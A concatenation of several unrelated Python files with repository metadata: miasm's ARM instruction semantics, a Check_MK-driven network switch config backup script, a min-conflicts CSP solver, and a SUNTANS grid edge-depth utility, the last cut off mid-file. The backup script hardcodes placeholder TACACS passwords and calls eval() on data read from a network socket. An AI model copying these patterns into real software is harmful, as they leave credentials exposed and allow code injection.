# XXX TODO
e = []
return e, []
def wfi(ir, instr):
# XXX TODO
e = []
return e, []
def adr(ir, instr, arg1, arg2):
e = []
e.append(ExprAssign(arg1, (PC & ExprInt(0xfffffffc, 32)) + arg2))
return e, []
def pkhbt(ir, instr, arg1, arg2, arg3):
e = []
e.append(
ExprAssign(
arg1,
ExprCompose(
arg2[:16],
arg3[16:]
)
)
)
return e, []
def pkhtb(ir, instr, arg1, arg2, arg3):
e = []
e.append(
ExprAssign(
arg1,
ExprCompose(
arg3[:16],
arg2[16:]
)
)
)
return e, []
COND_EQ = 0
COND_NE = 1
COND_CS = 2
COND_CC = 3
COND_MI = 4
COND_PL = 5
COND_VS = 6
COND_VC = 7
COND_HI = 8
COND_LS = 9
COND_GE = 10
COND_LT = 11
COND_GT = 12
COND_LE = 13
COND_AL = 14
COND_NV = 15
cond_dct = {
COND_EQ: "EQ",
COND_NE: "NE",
COND_CS: "CS",
COND_CC: "CC",
COND_MI: "MI",
COND_PL: "PL",
COND_VS: "VS",
COND_VC: "VC",
COND_HI: "HI",
COND_LS: "LS",
COND_GE: "GE",
COND_LT: "LT",
COND_GT: "GT",
COND_LE: "LE",
COND_AL: "AL",
# COND_NV: "NV",
}
cond_dct_inv = dict((name, num) for num, name in viewitems(cond_dct))
"""
Code Meaning (for cmp or subs) Flags Tested
eq Equal. Z==1
ne Not equal. Z==0
cs or hs Unsigned higher or same (or carry set). C==1
cc or lo Unsigned lower (or carry clear). C==0
mi Negative. The mnemonic stands for "minus". N==1
pl Positive or zero. The mnemonic stands for "plus". N==0
vs Signed overflow. The mnemonic stands for "V set". V==1
vc No signed overflow. The mnemonic stands for "V clear". V==0
hi Unsigned higher. (C==1) && (Z==0)
ls Unsigned lower or same. (C==0) || (Z==1)
ge Signed greater than or equal. N==V
lt Signed less than. N!=V
gt Signed greater than. (Z==0) && (N==V)
le Signed less than or equal. (Z==1) || (N!=V)
al (or omitted) Always executed. None tested.
"""
tab_cond = {COND_EQ: ExprOp("CC_EQ", zf),
COND_NE: ExprOp("CC_NE", zf),
COND_CS: ExprOp("CC_U>=", cf ^ ExprInt(1, 1)), # inv cf
COND_CC: ExprOp("CC_U<", cf ^ ExprInt(1, 1)), # inv cf
COND_MI: ExprOp("CC_NEG", nf),
COND_PL: ExprOp("CC_POS", nf),
COND_VS: ExprOp("CC_sOVR", of),
COND_VC: ExprOp("CC_sNOOVR", of),
COND_HI: ExprOp("CC_U>", cf ^ ExprInt(1, 1), zf), # inv cf
COND_LS: ExprOp("CC_U<=", cf ^ ExprInt(1, 1), zf), # inv cf
COND_GE: ExprOp("CC_S>=", nf, of),
COND_LT: ExprOp("CC_S<", nf, of),
COND_GT: ExprOp("CC_S>", nf, of, zf),
COND_LE: ExprOp("CC_S<=", nf, of, zf),
}
def is_pc_written(ir, instr_ir):
all_pc = viewvalues(ir.mn.pc)
for ir in instr_ir:
if ir.dst in all_pc:
return True, ir.dst
return False, None
def add_condition_expr(ir, instr, cond, instr_ir, extra_ir):
if cond == COND_AL:
return instr_ir, extra_ir
if not cond in tab_cond:
raise ValueError('unknown condition %r' % cond)
cond = tab_cond[cond]
loc_next = ir.get_next_loc_key(instr)
loc_next_expr = ExprLoc(loc_next, 32)
loc_do = ir.loc_db.add_location()
loc_do_expr = ExprLoc(loc_do, 32)
dst_cond = ExprCond(cond, loc_do_expr, loc_next_expr)
assert(isinstance(instr_ir, list))
has_irdst = False
for e in instr_ir:
if e.dst == ir.IRDst:
has_irdst = True
break
if not has_irdst:
instr_ir.append(ExprAssign(ir.IRDst, loc_next_expr))
e_do = IRBlock(loc_do, [AssignBlock(instr_ir, instr)])
e = [ExprAssign(ir.IRDst, dst_cond)]
return e, [e_do] + extra_ir
mnemo_func = {}
mnemo_func_cond = {}
mnemo_condm0 = {'add': add,
'sub': sub,
'eor': eor,
'and': l_and,
'rsb': rsb,
'adc': adc,
'sbc': sbc,
'rsc': rsc,
'tst': tst,
'teq': teq,
'cmp': l_cmp,
'cmn': cmn,
'orr': orr,
'mov': mov,
'movt': movt,
'bic': bic,
'mvn': mvn,
'neg': neg,
'sdiv': sdiv,
'udiv': udiv,
'mul': mul,
'umull': umull,
'umlal': umlal,
'smull': smull,
'smlal': smlal,
'mla': mla,
'ldr': ldr,
'ldrd': ldrd,
'ldrsb': ldrsb,
'str': l_str,
'strd': l_strd,
'b': b,
'bl': bl,
'svc': svc,
'und': und,
'bx': bx,
'ldrh': ldrh,
'strh': strh,
'ldrsh': ldrsh,
'ldsh': ldrsh,
'uxtb': uxtb,
'uxth': uxth,
'sxtb': sxtb,
'sxth': sxth,
'ubfx': ubfx,
'bfc': bfc,
'rev': rev,
'rev16': rev16,
'clz': clz,
'uxtab': uxtab,
'uxtah': uxtah,
'bkpt': bkpt,
'smulbb': smul,
'smulbt': smul,
'smultb': smul,
'smultt': smul,
'smulwt': smulw,
'smulwb': smulw,
'pkhtb': pkhtb,
'pkhbt': pkhbt,
}
mnemo_condm1 = {'adds': add,
'subs': subs,
'eors': eors,
'ands': l_and,
'rsbs': rsbs,
'adcs': adc,
'sbcs': sbcs,
'rscs': rscs,
'orrs': orrs,
'movs': movs,
'bics': bics,
'mvns': mvns,
'mrs': mrs,
'msr': msr,
'negs': negs,
'muls': muls,
'mls': mls,
'mlas': mlas,
'blx': blx,
'ldrb': ldrb,
'ldsb': ldrsb,
'strb': strb,
}
mnemo_condm2 = {'ldmia': ldmia,
'ldmib': ldmib,
'ldmda': ldmda,
'ldmdb': ldmdb,
'ldmfa': ldmda,
'ldmfd': ldmia,
'ldmea': ldmdb,
'ldmed': ldmib, # XXX
'stmia': stmia,
'stmib': stmib,
'stmda': stmda,
'stmdb': stmdb,
'stmfa': stmib,
'stmed': stmda,
'stmfd': stmdb,
'stmea': stmia,
}
mnemo_nocond = {'lsr': lsr,
'lsrs': lsrs,
'lsl': lsl,
'lsls': lsls,
'rors': rors,
'push': push,
'pop': pop,
'asr': asr,
'asrs': asrs,
'cbz': cbz,
'cbnz': cbnz,
'pld': pld,
'pldw': pldw,
'tbb': tbb,
'tbh': tbh,
'nop': nop,
'dsb': dsb,
'cpsie': cpsie,
'cpsid': cpsid,
'wfe': wfe,
'wfi': wfi,
'adr': adr,
'orn': orn,
'smlabb': smlabb,
'smlabt': smlabt,
'smlatb': smlatb,
'smlatt': smlatt,
'uadd8': uadd8,
'sel': sel,
}
mn_cond_x = [mnemo_condm0,
mnemo_condm1,
mnemo_condm2]
for index, mn_base in enumerate(mn_cond_x):
for mn, mf in viewitems(mn_base):
for cond, cn in viewitems(cond_dct):
if cond == COND_AL:
cn = ""
cn = cn.lower()
if index == 0:
mn_mod = mn + cn
else:
mn_mod = mn[:-index] + cn + mn[-index:]
# print mn_mod
mnemo_func_cond[mn_mod] = cond, mf
for name, mf in viewitems(mnemo_nocond):
mnemo_func_cond[name] = COND_AL, mf
def split_expr_dst(ir, instr_ir):
out = []
dst = None
for i in instr_ir:
if i.dst == ir.pc:
out.append(i)
dst = ir.pc # i.src
else:
out.append(i)
return out, dst
def get_mnemo_expr(ir, instr, *args):
if not instr.name.lower() in mnemo_func_cond:
raise ValueError('unknown mnemo %s' % instr)
cond, mf = mnemo_func_cond[instr.name.lower()]
instr_ir, extra_ir = mf(ir, instr, *args)
instr, extra_ir = add_condition_expr(ir, instr, cond, instr_ir, extra_ir)
return instr, extra_ir
get_arm_instr_expr = get_mnemo_expr
class arminfo(object):
mode = "arm"
# offset
class ir_arml(IntermediateRepresentation):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_arm, "l", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
def mod_pc(self, instr, instr_ir, extra_ir):
# fix PC (+8 for arm)
pc_fixed = {self.pc: ExprInt(instr.offset + 8, 32)}
for i, expr in enumerate(instr_ir):
dst, src = expr.dst, expr.src
if dst != self.pc:
dst = dst.replace_expr(pc_fixed)
src = src.replace_expr(pc_fixed)
instr_ir[i] = ExprAssign(dst, src)
for idx, irblock in enumerate(extra_ir):
extra_ir[idx] = irblock.modify_exprs(lambda expr: expr.replace_expr(pc_fixed) \
if expr != self.pc else expr,
lambda expr: expr.replace_expr(pc_fixed))
def get_ir(self, instr):
args = instr.args
# ir = get_mnemo_expr(self, self.name.lower(), *args)
if len(args) and isinstance(args[-1], ExprOp):
if args[-1].op == 'rrx':
args[-1] = ExprCompose(args[-1].args[0][1:], cf)
elif (args[-1].op in ['<<', '>>', '<<a', 'a>>', '<<<', '>>>'] and
isinstance(args[-1].args[-1], ExprId)):
args[-1] = ExprOp(args[-1].op,
args[-1].args[0],
args[-1].args[-1][:8].zeroExtend(32))
instr_ir, extra_ir = get_mnemo_expr(self, instr, *args)
self.mod_pc(instr, instr_ir, extra_ir)
return instr_ir, extra_ir
def parse_itt(self, instr):
name = instr.name
assert name.startswith('IT')
name = name[1:]
out = []
for hint in name:
if hint == 'T':
out.append(0)
elif hint == "E":
out.append(1)
else:
raise ValueError("IT name invalid %s" % instr)
return out, instr.args[0]
def do_it_block(self, loc, index, block, assignments, gen_pc_updt):
instr = block.lines[index]
it_hints, it_cond = self.parse_itt(instr)
cond_num = cond_dct_inv[it_cond.name]
cond_eq = tab_cond[cond_num]
if not index + len(it_hints) <= len(block.lines):
raise NotImplementedError("Split IT block non supported yet")
ir_blocks_all = []
# Gen dummy irblock for IT instr
loc_next = self.get_next_loc_key(instr)
dst = ExprAssign(self.IRDst, ExprLoc(loc_next, 32))
dst_blk = AssignBlock([dst], instr)
assignments.append(dst_blk)
irblock = IRBlock(loc, assignments)
ir_blocks_all.append([irblock])
loc = loc_next
assignments = []
for hint in it_hints:
irblocks = []
index += 1
instr = block.lines[index]
# Add conditionnal jump to current irblock
loc_do = self.loc_db.add_location()
loc_next = self.get_next_loc_key(instr)
if hint:
local_cond = ~cond_eq
else:
local_cond = cond_eq
dst = ExprAssign(self.IRDst, ExprCond(local_cond, ExprLoc(loc_do, 32), ExprLoc(loc_next, 32)))
dst_blk = AssignBlock([dst], instr)
assignments.append(dst_blk)
irblock = IRBlock(loc, assignments)
irblocks.append(irblock)
it_instr_irblocks = []
assignments = []
loc = loc_do
split = self.add_instr_to_current_state(
instr, block, assignments,
it_instr_irblocks, gen_pc_updt
)
if split:
raise NotImplementedError("Unsupported instr in IT block (%s)" % instr)
if it_instr_irblocks:
assert len(it_instr_irblocks) == 1
it_instr_irblocks = it_instr_irblocks.pop()
# Remove flags assignment if instr != [CMP, CMN, TST]
if instr.name not in ["CMP", "CMN", "TST"]:
# Fix assignments
out = []
for assignment in assignments:
assignment = AssignBlock(
{
dst: src for (dst, src) in viewitems(assignment)
if dst not in [zf, nf, of, cf]
},
assignment.instr
)
out.append(assignment)
assignments = out
# Fix extra irblocksx
new_irblocks = []
for irblock in it_instr_irblocks:
out = []
for tmp_assignment in irblock:
assignment = AssignBlock(
{
dst: src for (dst, src) in viewitems(assignment)
if dst not in [zf, nf, of, cf]
},
assignment.instr
)
out.append(assignment)
new_irblock = IRBlock(irblock.loc_key, out)
new_irblocks.append(new_irblock)
it_instr_irblocks = new_irblocks
irblocks += it_instr_irblocks
dst = ExprAssign(self.IRDst, ExprLoc(loc_next, 32))
dst_blk = AssignBlock([dst], instr)
assignments.append(dst_blk)
irblock = IRBlock(loc, assignments)
irblocks.append(irblock)
loc = loc_next
assignments = []
ir_blocks_all.append(irblocks)
return index, ir_blocks_all
def add_asmblock_to_ircfg(self, block, ircfg, gen_pc_updt=False):
"""
Add a native block to the current IR
@block: native assembly block
@gen_pc_updt: insert PC update effects between instructions
"""
it_hints = None
it_cond = None
label = block.loc_key
assignments = []
ir_blocks_all = []
index = -1
while index + 1 < len(block.lines):
index += 1
instr = block.lines[index]
if label is None:
assignments = []
label = self.get_loc_key_for_instr(instr)
if instr.name.startswith("IT"):
index, irblocks_it = self.do_it_block(label, index, block, assignments, gen_pc_updt)
for irblocks in irblocks_it:
ir_blocks_all += irblocks
label = None
continue
split = self.add_instr_to_current_state(
instr, block, assignments,
ir_blocks_all, gen_pc_updt
)
if split:
ir_blocks_all.append(IRBlock(label, assignments))
label = None
assignments = []
if label is not None:
ir_blocks_all.append(IRBlock(label, assignments))
new_ir_blocks_all = self.post_add_asmblock_to_ircfg(block, ircfg, ir_blocks_all)
for irblock in new_ir_blocks_all:
ircfg.add_irblock(irblock)
return new_ir_blocks_all
class ir_armb(ir_arml):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_arm, "b", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
class ir_armtl(ir_arml):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_armt, "l", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
def mod_pc(self, instr, instr_ir, extra_ir):
# fix PC (+4 for thumb)
pc_fixed = {self.pc: ExprInt(instr.offset + 4, 32)}
for i, expr in enumerate(instr_ir):
dst, src = expr.dst, expr.src
if dst != self.pc:
dst = dst.replace_expr(pc_fixed)
src = src.replace_expr(pc_fixed)
instr_ir[i] = ExprAssign(dst, src)
for idx, irblock in enumerate(extra_ir):
extra_ir[idx] = irblock.modify_exprs(lambda expr: expr.replace_expr(pc_fixed) \
if expr != self.pc else expr,
lambda expr: expr.replace_expr(pc_fixed))
class ir_armtb(ir_armtl):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_armt, "b", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
|
commial/miasm
|
miasm/arch/arm/sem.py
|
Python
|
gpl-2.0
| 49,320
|
#!/usr/bin/python
#
import socket
from device_cisco_hp import Device_cisco_hp
#from device_f5 import Device_f5
#from device_wlc import Device_wlc
import time
import sys
import re
import os
def recv_timeout(the_socket,timeout=2):
#make socket non blocking
the_socket.setblocking(0)
#total data partwise in an array
total_data=[];
data='';
#beginning time
begin=time.time()
while 1:
#if you got some data, then break after timeout
if total_data and time.time()-begin > timeout:
break
#if you got no data at all, wait a little longer, twice the timeout
elif time.time()-begin > timeout*2:
break
#recv something
try:
data = the_socket.recv(8192)
if data:
total_data.append(data)
#change the beginning time for measurement
begin=time.time()
else:
#sleep for sometime to indicate a gap
time.sleep(0.1)
except:
pass
#join all parts to make final string
return ''.join(total_data)
def list_startswith(item, list):
found = False
for i in list:
if item.startswith(i):
found = True
break
return found
def list_find(item, list):
found = False
for i in list:
if item.find(i) != -1:
found = True
break
return found
def get_backuphosts(lql_answer_python):
backuphosts = []
backuphosts_ignored = []
# alle Geraete die mit folgenden SNMP-Info Strings beginnen, werden gebackupt
snmpinfo_cisco_hp = [ "sysDescr: Cisco IOS Software",
"sysDescr: Cisco Internetwork Operating System Software",
"sysDescr: Cisco NX-OS",
"sysDescr: HP J",
"sysDescr: ProCurve J",
"sysDescr: Cisco Adaptive Security Appliance",
"sysDescr: Content Switch",
"sysDescr: ACE 4710 Application Control Engine Appliance"]
#snmpinfo_f5 = ["sysDescr: Linux F5"]
#snmpinfo_wlc = ["sysDescr: Cisco Controller"]
#snmpinfo_all = snmpinfo_cisco_hp + snmpinfo_f5 + snmpinfo_wlc
snmpinfo_all = snmpinfo_cisco_hp
# Diese Hosts werden ignoritert
ips_ignore = { "10.1.1.1":"LB_01",
"10.2.2.2":"LB_02",
}
# Entscheiden ob Hosten in der Tabelle gebackupt werden soll oder nicht.
for host in lql_answer_python:
(host_name, host_alias, host_address, plugin_output, host_filename) = host
if list_find(plugin_output, snmpinfo_all) and not host_address.startswith("10.127.") and not host_address in ips_ignore.keys():
backuphosts.append(host)
else:
backuphosts_ignored.append(host)
# Listen sortieren
backuphosts.sort(key=lambda tup: tup[0])
backuphosts_ignored.sort(key=lambda tup: tup[0])
return (backuphosts,backuphosts_ignored, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc)
# Holte die Config vom Host
def get_config_cisco_hp(host, log_file):
(host_name, host_alias, host_address, plugin_output, host_filename) = host
device = Device_cisco_hp(host_address.strip(),log_file)
# Telnet fuer CSS Loadbalancer
if plugin_output.find("sysDescr: Content Switch") != -1:
device.set_prefer_telnet()
device.logging("--- Hostname: " + host_name)
#device.set_debug_mode(True)
#device.set_demo_config_mode(True)
tacacs_username = 'test'
tacacs_tpasswort = 'test1'
ips_dsl = ["192.168.121.1", "192.168.121.2"]
if list_startswith(host_address, ips_dsl ):
device.logging("--- Anmeldedaten: DSL-Switche")
device.connect(tacacs_username, tacacs_tpasswort, 'test')
else:
device.logging("--- Anmeldedaten: TACACS only")
device.connect(tacacs_username, tacacs_tpasswort)
config = device.command("show running-config")
write_memory_config(device, host)
device.disconnect()
return config
def write_memory_config(device, host):
(host_name, host_alias, host_address, plugin_output, host_filename) = host
snmpinfo_nexus = ["sysDescr: Cisco NX-OS"]
snmpinfo_ace = ["sysDescr: ACE 4710 Application Control Engine Appliance"]
snmpinfo_css = ["sysDescr: Content Switch"]
snmpinfo_hp = ["sysDescr: HP J", "sysDescr: ProCurve J"]
if list_find(plugin_output, snmpinfo_nexus):
save_output = device.command("copy running-config startup-config")
if save_output.find("Copy complete") != -1:
device.logging("--- INFO: -copy running-config startup-config- erfolgreich ausgefuehrt")
else:
device.logging("ERROR: -copy running-config startup-config- konnte NICHT erfolgreich ausgefuehrt werden!")
device.logging(save_output)
elif list_find(plugin_output, snmpinfo_ace):
save_output = device.command("write memory")
if save_output.find("Sync Done") != -1:
device.logging("--- INFO: -write memory- erfolgreich ausgefuehrt")
else:
device.logging("ERROR: -write memory- konnte NICHT erfolgreich ausgefuehrt werden!")
device.logging(save_output)
elif list_find(plugin_output, snmpinfo_css):
save_output = device.command("write memory")
if save_output.find("Working..") != -1:
device.logging("--- INFO: -write memory- EVENTUELL erfolgreich ausgefuehrt")
else:
device.logging("ERROR: -write memory- konnte NICHT erfolgreich ausgefuehrt werden!")
device.logging(save_output)
elif list_find(plugin_output, snmpinfo_hp):
save_output = device.command("write memory")
if len(save_output) == 1 or len(save_output) == 2:
device.logging("--- INFO: -write memory- erfolgreich ausgefuehrt")
#else:
# device.logging("ERROR: -write memory- konnte NICHT erfolgreich ausgefuehrt werden!")
# device.logging(save_output)
else:
save_output = device.command("write memory")
if save_output.find("[OK]") != -1:
device.logging("--- INFO: -write memory- erfolgreich ausgefuehrt")
else:
device.logging("ERROR: -write memory- konnte NICHT erfolgreich ausgefuehrt werden!")
device.logging(save_output)
#def get_config_f5(host, log_file, path):
#def get_config_wlc(host, log_file, date):
# Speichert eine Textdatei ab
def save_output(address, config, extension, path, date):
#date = time.strftime("%Y-%m-%d_%H-%M-%S")
file_name = str(address) + "_" + str(date) + "." + extension
config_file_path = path + file_name
fh = open(config_file_path,"w")
fh.writelines(config)
fh.close()
return config_file_path
def logging(log_file, msg):
log_file.writelines(msg)
print msg
def backup_devices(backuphosts, backuphosts_ignored, server, livestatus_log, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc):
base_path = "/daten/backup/backup_config/"
lastbackup_path = base_path + "lastbackup/"
date = time.strftime("%Y-%m-%d")
date_time = time.strftime("%Y-%m-%d_%H-%M-%S")
path = base_path + date + "_" + server[0] + "/"
if not os.path.exists(path):
os.mkdir(path)
if not os.path.exists(lastbackup_path):
os.mkdir(lastbackup_path)
log_file_path = path + "DEVICELOG_" + date_time + ".log"
log_file = open(log_file_path,"w")
logging(log_file, livestatus_log)
# Symlink Logfile anlegen
log_file_symlink = lastbackup_path + "DEVICELOG_" + server[0] + ".log"
if os.path.islink(log_file_symlink):
os.unlink(log_file_symlink)
os.symlink(log_file_path.replace(base_path,"../"), log_file_symlink)
for host in backuphosts:
(host_name, host_alias, host_address, plugin_output, host_filename) = host
try:
logging(log_file, "\n\n")
config = "# CheckMK-host_name: " + str(host_name)
config += "\n# CheckMK-host_alias: " + str(host_alias)
config += "\n# CheckMK-host_address: " + str(host_address)
config += "\n# CheckMK-host_filename: " + str(host_filename)
config += "\n# CheckMK-SNMPInfov2: " + str(plugin_output)
config += "\n#----------------------------------------------------------------\n\n\n\n"
# Config vom Geraet holen
if list_find(plugin_output, snmpinfo_cisco_hp):
device_config = get_config_cisco_hp(host,log_file)
# elif list_find(plugin_output, snmpinfo_f5):
# device_config = get_config_f5(host,log_file, path)
# elif list_find(plugin_output, snmpinfo_wlc):
# device_config = get_config_wlc(host, log_file, date)
else:
raise Exception("ERROR: Keine 'get_config()' Methode fuer Host gefunden!")
if len(device_config) == 0:
logging(log_file, "ERROR: Device config ist empty")
config += device_config
# Cofig in Datei schreiben
config_file_path = save_output(host_address, config, "config", path, date_time)
logging(log_file,"--- Backupfile: " + config_file_path)
# Symlink anlegen
lastbackup_config_link = lastbackup_path + host_address + ".config"
if os.path.islink(lastbackup_config_link):
os.unlink(lastbackup_config_link)
os.symlink(config_file_path.replace(base_path,"../"), lastbackup_config_link)
except Exception, e:
logging(log_file,"ERROR: %s" % str(e) )
save_output(host_address, str(e), "error", path, date_time)
# ------------------------------------------------------------
if len(backuphosts_ignored) > 0:
logging(log_file,"\n\n\n\nIgnored Hosts:\n\n")
for host in backuphosts_ignored:
(host_name, host_alias, host_address, plugin_output, host_filename) = host
logging(log_file,"\nIP: " + host_address)
logging(log_file,", Hosts: " + host_name)
log_file.close()
def get_hostByLivestatus():
#socket_path = "/omd/sites/prod/tmp/run/live"
#s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
#s.connect(socket_path)
all_server = [('1.1.1.1', 6557),('2.2.2.2', 6557)]
lql = "GET services\n"
lql += "Columns: host_name host_alias host_address plugin_output host_filename\n"
lql += "Filter: check_command = check_mk-snmp_info_v2\n"
lql += "Filter: host_plugin_output !~ No IP packet received\n"
lql += "OutputFormat: python\n"
#lql += "Limit: 11\n"
for server in all_server:
try:
livestatus_log = ""
msg = "\n#--------------------------------------------------------------------------------\n\n"
msg += "Verbinde zu: " + str(server)
livestatus_log += msg + "\n"
print msg
max_attempts = 10
for attempt in range(max_attempts):
msg = "Verbindungsversuch: #" + str(attempt)
livestatus_log += msg + "\n"
print msg
# Verbinden zum Server und LQL abfragen
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server)
s.send(lql)
s.shutdown(socket.SHUT_WR)
lql_answer = recv_timeout(s)
if len(lql_answer) < 10:
if attempt < max_attempts:
time.sleep(20)
else:
raise Exception("ERROR: Es wurden keine Daten von Server empfangen!")
else:
break
#konvertiere Antwort in Python Sourcecode
lql_answer_python = eval(lql_answer)
if len(lql_answer_python) < 10:
raise Exception("ERROR: Die von Server empfangenen Daten konnten nicht in Python-Daten konvertiert werden!")
# alle Host in der "table" werden auf die beidne Listen backuphosts, backuphosts_ignored aufgeteilt
(backuphosts, backuphosts_ignored, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc) = get_backuphosts(lql_answer_python)
# Alle Geraete in backuphosts werden gebackupt
backup_devices(backuphosts, backuphosts_ignored, server, livestatus_log, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc)
#print backuphosts
except Exception, e:
livestatus_log += str(e) + "\n"
print str(e)
backup_devices([], [], server, livestatus_log, [], [])
get_hostByLivestatus()
|
christianbur/check_mk
|
network_management_with_cmk/backup_switche.py
|
Python
|
gpl-2.0
| 12,734
|
"""This file contains different Solving Agents for CSP Problems """
def minConflict(problem, numIter=100000):
"""Min Conflict : Solves Constraint Satisfaction Problems.
Given a possible assignment of all variables in CSP, it re-assigns all variables iteratively untill all contraints are satisfied
INPUTS:
problem: CSP Problem
numIter: Number of maximum Iterations Allowed
OUTPUT
Solution to CSP, or failure
"""
print 'number of iterations =', numIter
state = problem.getStartState()
print "Initial State"
problem.visualize(state)
for i in range(numIter):
var = problem.getVar(state) #Get the next conflicted variable randomly
#No conflict, i.e. We have solved the problem
if var == -1:
print "Solution state found in", i, "iterations"
problem.visualize(state)
return state
val = problem.getValue(state, var) #Get the value which will be assigned. Value should be chosen such that it causes least conflicts. Ties are broken randomly
state = problem.updateBoard(state, var, val)
print "Solution not found! Try with high iterations"
return []
|
kushjain/Min-Conflicts
|
solveAgent.py
|
Python
|
gpl-2.0
| 1,214
|
"""Helper code for running QuickTile functional tests"""
__author__ = "Stephan Sokolow (deitarion/SSokolow)"
__license__ = "GNU GPL 2.0 or later"
|
ssokolow/quicktile
|
functional_harness/__init__.py
|
Python
|
gpl-2.0
| 147
|
# Some utilities for dealing with specifying edge depths:
import getopt
import sys,os
sys.path.append(os.path.join(os.environ['HOME'], 'python'))
from numpy import *
import sunreader
#reload(sunreader)
import pdb
class EdgeDepthWriter(object):
""" For a grid that has been partitioned, write out new edge-based bathymetry
and update the cell bathymetry accordingly.
If a depth field is specified to run, it will be queried (via value_on_edge) for
the edge depths.
If no depth field is given, but the sunreader instance has a global edgedepths.dat,
it will be mapped to the per-processor edges.
Otherwise the previous cell depths will be interpolated to get
the new edge depths.
Either way, new cell depths are taken as the minimum depth of adjacent edges.
"""
def __init__(self,delete_friction_strips=False):
""" delete_friction_strips: if true, a final step will lower edges to the elevation
of the higher of the two cell neighbors. Note that this is done *after* the
cells were set to the lowest neighboring edge, so the overall effect is to
increase flux areas.
by default, the edges will have already been set to be the elevation of the
shallower neighboring cell, based on cell depths. That tends to smear out
edge depths, and on average make the flux areas too small.
"""
self.delete_friction_strips = delete_friction_strips
def run(self,argv=[],sun=None,depth_field=None):
""" Specify one of sun, or command-line style argv
at the moment only a single command-line arguments is supported, specifying the
datadir to read from
"""
if sun is not None:
self.sun = sun
else:
## Handle command line
datadir = '.'
opts,rest = getopt.getopt(argv,'')
for opt,val in opts:
pass
if len(rest):
datadir = rest[0]
## Prep
self.sun = sunreader.SunReader(datadir)
try:
self.sun.file_path('edgedepths',0)
except:
print "Maybe you need to set edgedepths in suntans.dat?"
raise
## Do it.
self.process(depth_field=depth_field)
def process(self,depth_field=None):
np = self.sun.num_processors()
global_edge_depths = None
global_grid = None
## Establish the source for edge depths
if depth_field is None:
fn = self.sun.file_path('edgedepths')
if os.path.exists( fn ):
print "Loading global edge depths and mapping global->local"
global_edge_depths = loadtxt(fn)
global_grid = self.sun.grid()
else:
print "Looking for edge depth file %s"%fn
print "Will resort to linear interpolation of cell depths for edge depth"
else:
print "Will use explicitly given depth field for edge elevations"
# will have to hold all data at one time..
proc_edgedepths = [None] * np
proc_edgedata = [None] * np
proc_celldata = [None] * np
# 1 - get edge elevations and Nke.
for proc in range(self.sun.num_processors()):
edgedata = self.sun.edgedata(proc)
celldata = self.sun.celldata(proc)
g = self.sun.grid(proc)
edgedepths = zeros( len(edgedata), float64 )
# Save for inter-proc use:
proc_edgedata[proc] = edgedata
proc_celldata[proc] = celldata
proc_edgedepths[proc] = edgedepths
# if depth_field exists, query directly for edge depths
# if global_edge_depths exists, take pre-calculated edge depths from there
# otherwise, interpolate between neighboring cells.
for j in range(len(edgedata)):
if depth_field is not None:
de = depth_field.value_on_edge( g.points[g.edges[j,:2]] )
elif global_edge_depths is not None:
global_j = global_grid.find_edge( g.edges[j,:2] )
de = global_edge_depths[global_j,2]
else:
nc1,nc2 = edgedata[j,8:10].astype(int32)
face1,face2 = edgedata[j,10:12].astype(int32)
if nc2 < 0:
nc2 = nc1
face2 = face1
elif nc1 < 0:
nc1 = nc2
face1 = face2
df1 = celldata[nc1,14+face1]
df2 = celldata[nc2,14+face2]
# linearly interpolate
de = (df1*celldata[nc2,3] + df2*celldata[nc1,3]) / (df1+df2)
edgedepths[j] = de
## Update Nke
# de are as soundings.
# h_to_ctop expects elevations, and by default uses dzmin to get the
# surface behavior.
# add 1 because Nke is the *number* of levels, whereas h_to_ctop gives
# the *index* of the level where this elevation belongs.
# for example, if the z-levels are every 0.5m, and the edgedepth is exactly 4.5,
# this should give us Nke =
# Add the epsilon to make sure that any roundoff from the interpolation above doesn't
# screw up an exact comparison
offenders = nonzero(edgedepths > self.sun.z_levels()[-1])[0]
# allow a bit of leeway in case of ascii roundoff - fix it regardless, but only
# report the issue if it's significant.
bad_offenders = nonzero(edgedepths > 1e-5 + self.sun.z_levels()[-1])[0]
if len(offenders) > 0:
if len(bad_offenders) > 0:
print "Bottom of lowest z-level is %f"%self.sun.z_levels()[-1]
print "There were %d edges given a depth below this"%len(offenders)
print "And %d of those are significant "%len(bad_offenders)
print "too deep by these distances: "
print edgedepths[bad_offenders] - self.sun.z_levels()[-1]
# raise Exception,"Whoa there - edges are too deep!"
print "WARNING: these edges will have their depth truncated. "
print " to avoid this, specify a vertspace.dat.in that goes"
print " deep enough"
edgedepths[offenders] = self.sun.z_levels()[-1]
edgedata[:,6] = searchsorted(self.sun.z_levels()+1e-8,edgedepths) + 1
# double check
nkmax = self.sun.conf_int('Nkmax')
if nkmax>1 and any(edgedata[:,6]>nkmax):
raise Exception,"How did a deep edge get through?"
# Interprocessor - only exchange Nke from edgedata:
self.sun.sendrecv_edges([a[:,6] for a in proc_edgedata])
self.sun.sendrecv_edges(proc_edgedepths)
## Set cell depth, Nk from deepest edge
for proc in range(self.sun.num_processors()):
edgedata = proc_edgedata[proc]
celldata = proc_celldata[proc]
edgedepths = proc_edgedepths[proc]
# Update cell depths and Nk[] from the edges
for i in range(len(celldata)):
js = celldata[i,5:8].astype(int32)
# depth = max(depth)
celldata[i,3] = edgedepths[js].max()
# Nk = max(Nke)
celldata[i,4] = edgedata[js,6].max()
# And update the edge's Nkc
for j in range(len(edgedata)):
nc1,nc2 = edgedata[j,8:10].astype(int32)
if nc2 < 0:
nc2 = nc1
elif nc1 < 0:
nc1 = nc2
edgedata[j,7] = max( celldata[nc1,4],
celldata[nc2,4] )
# Now Nkc on marker 6 edges is corrupt - fix it
# those edges could only see one cell locally, but the neighbor
